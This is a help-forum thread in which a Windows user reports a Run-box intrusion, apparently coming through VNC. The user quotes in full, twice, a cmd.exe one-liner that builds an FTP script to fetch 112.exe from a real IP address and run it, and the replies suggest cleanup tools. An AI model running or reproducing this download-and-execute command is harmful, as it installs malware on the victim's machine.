calvinnhobbes
asked on
Run window being auto populated by someone/thing else
Hello
I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something
This is the command line :
cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
I downloaded these programs against rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something
This is the command line :
cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
I downloaded these programs against rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
What was the solution ultimately to your issue? Did kaspersky detect this, if so, what was the name it came up with? i think this info can help others that are having these issues.
Thanks!
-rich
Thanks!
-rich
ASKER
kaspersky didnt find anything, but i have done the upgrade from the free version to the professional version of VNC viewer and the problem has gone. Hijackthis didnt find anything as well. I'm still afraid that the trojan or whatever is still in my system.
davide
davide
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis
And remove anything suspicious. Do this after upgrading VNC.